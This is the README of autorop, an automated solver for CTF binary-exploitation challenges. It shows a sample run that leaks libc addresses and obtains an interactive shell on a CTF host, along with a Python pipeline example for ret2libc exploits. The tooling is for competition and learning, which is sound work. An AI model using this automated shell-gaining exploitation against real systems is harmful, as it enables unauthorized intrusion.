mariuszskon/autorop
Automated solver of classic CTF pwn challenges, with flexibility in mind.

Official documentation can be found at autorop.readthedocs.io.

Disclaimer

Do not use this software for illegal purposes. This software is intended to be used in legal Capture the Flag competitions only.

Command line

```
$ autorop
Usage: autorop BINARY [HOST PORT]
$ autorop tests/bamboofox/ret2libc bamboofox.cs.nctu.edu.tw 11002
[*] '/home/mariusz/Projects/autorop/tests/bamboofox/ret2libc'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] Produced pipeline: Classic(Corefile(), OpenTarget(), Puts(False, ['__libc_start_main', 'puts']), Auto(), SystemBinSh())
[*] Pipeline [1/5]: Corefile()
[+] Starting local process 'tests/bamboofox/ret2libc': pid 18833
[*] Process 'tests/bamboofox/ret2libc' stopped with exit code -11 (SIGSEGV) (pid 18833)
...
[*] Switching to interactive mode
Hello!
The address of "/bin/sh" is 0x804a02c
The address of function "puts" is 0xf7e43da0
$ wc -c /home/ctf/flag
57 /home/ctf/flag
```

API

Importing autorop automatically does a `from pwn import *`, so you can use all of pwntools' goodies.

Central to autorop's design is the pipeline. Most functions take in a `PwnState`, and pass it on to the next function with some attributes changed. `Pipeline` copies* the `PwnState` between each function so mutations are safe. This allows great simplicity and flexibility.

See how the below example neatly manages to "downgrade" the problem from something unique, to something generic that the `Classic` pipeline can handle.

```python
from autorop import *

BIN = "./tests/tjctf_2020/stop"


def send_letter_first(tube, data):
    # the binary expects us to choose a letter first, before it takes input unsafely
    tube.sendline("A")
    # send actual payload
    tube.sendline(data)


# create a starting state
s = PwnState(BIN, lambda: process(BIN))
# set an overwriter function, if the buffer overflow input
# is not available immediately
s.overwriter = send_letter_first
# use base classic pipeline, with printf for leaking
pipeline = turnkey.Classic(leak=leak.Printf())
result = pipeline(s)
# switch to interactive shell which we got via the exploit
result.target.interactive()
```

*Note: Although most of the attributes are deep-copied, `target` and `_elf` are not.
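To make the copying rule above concrete, here is an added example that is not autorop's own code: a stand-in `PwnState` and `Pipeline` that deep-copy the state between stages, except for the attributes `target` and `_elf`, which are passed through by identity the way the note describes. The names `FakeTube`, `record_leak`, `build_chain` and `run_demo` are assumptions for the demonstration; the `puts` address is the value from the sample run in the Command line section, used here only as a constructed leak result.

```python
import copy
from typing import Callable, List


class PwnState:
    """Minimal stand-in for autorop's PwnState (assumption: not the real class).

    Attributes named in SHALLOW are shared between pipeline stages instead of
    deep-copied, mirroring the README note that `target` and `_elf` are shared.
    """

    SHALLOW = ("target", "_elf")

    def __init__(self, binary_name: str, target: object) -> None:
        self.binary_name = binary_name
        self.target = target                 # shared live handle (e.g. a process tube)
        self._elf = {"path": binary_name}    # constructed stand-in for the parsed ELF
        self.leaks: dict = {}                # per-stage data that must not leak backwards
        self.log: List[str] = []

    def __deepcopy__(self, memo):
        # Deep-copy every attribute except those in SHALLOW, which keep the
        # same object identity across stages.
        clone = self.__class__.__new__(self.__class__)
        memo[id(self)] = clone
        for name, value in self.__dict__.items():
            if name in self.SHALLOW:
                setattr(clone, name, value)
            else:
                setattr(clone, name, copy.deepcopy(value, memo))
        return clone


Stage = Callable[[PwnState], PwnState]


class Pipeline:
    """Runs stages in order, handing each one a copy of the previous output."""

    def __init__(self, *stages: Stage) -> None:
        self.stages = stages

    def __call__(self, state: PwnState) -> PwnState:
        current = state
        for stage in self.stages:
            # The copy is what makes in-place mutation inside a stage safe:
            # the caller's state and earlier stage outputs are never touched.
            current = stage(copy.deepcopy(current))
        return current


class FakeTube:
    """Constructed stand-in for a pwntools tube; it just records what was sent."""

    def __init__(self) -> None:
        self.sent: List[bytes] = []

    def sendline(self, data: bytes) -> None:
        self.sent.append(data)


def record_leak(state: PwnState) -> PwnState:
    # Mutates the state it was given; safe, because it is a copy.
    state.leaks["puts"] = 0xF7E43DA0   # constructed leak result (value from the sample run)
    state.log.append("leaked puts")
    # The shared handle is not copied, so this side effect is visible everywhere.
    state.target.sendline(b"leak-request")
    return state


def build_chain(state: PwnState) -> PwnState:
    state.log.append("built chain with %d leak(s)" % len(state.leaks))
    return state


def run_demo():
    """Return (input state, output state) so the copy semantics can be inspected."""
    tube = FakeTube()
    start = PwnState("./vuln", tube)
    result = Pipeline(record_leak, build_chain)(start)
    return start, result


if __name__ == "__main__":
    start, result = run_demo()
    print("input leaks :", start.leaks)           # still empty: the stage got a copy
    print("output leaks:", result.leaks)
    print("same target :", result.target is start.target)
    print("tube sent   :", start.target.sent)     # shared handle saw the send
```

The practical consequence of the shared attributes is the one to keep in mind when writing your own stages: mutating `state.leaks` or `state.log` inside a stage is harmless, but anything done through `state.target` (sending input, reading output) happens on the one live connection and cannot be undone by the copying.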

Install

  1. Install autorop itself. You might want to be in your python virtual environment. After cloning, install with pip:
     `$ git clone https://github.com/mariuszskon/autorop && cd autorop && pip install .`
  2. Make sure corefiles are enabled and are plainly written to the right directory:
     `# sysctl -w kernel.core_pattern=core.%p`
  3. (Optional) Install libc-database into `~/.libc-database` (or your own location, then edit `state.libc_database_path`).
  4. All done!
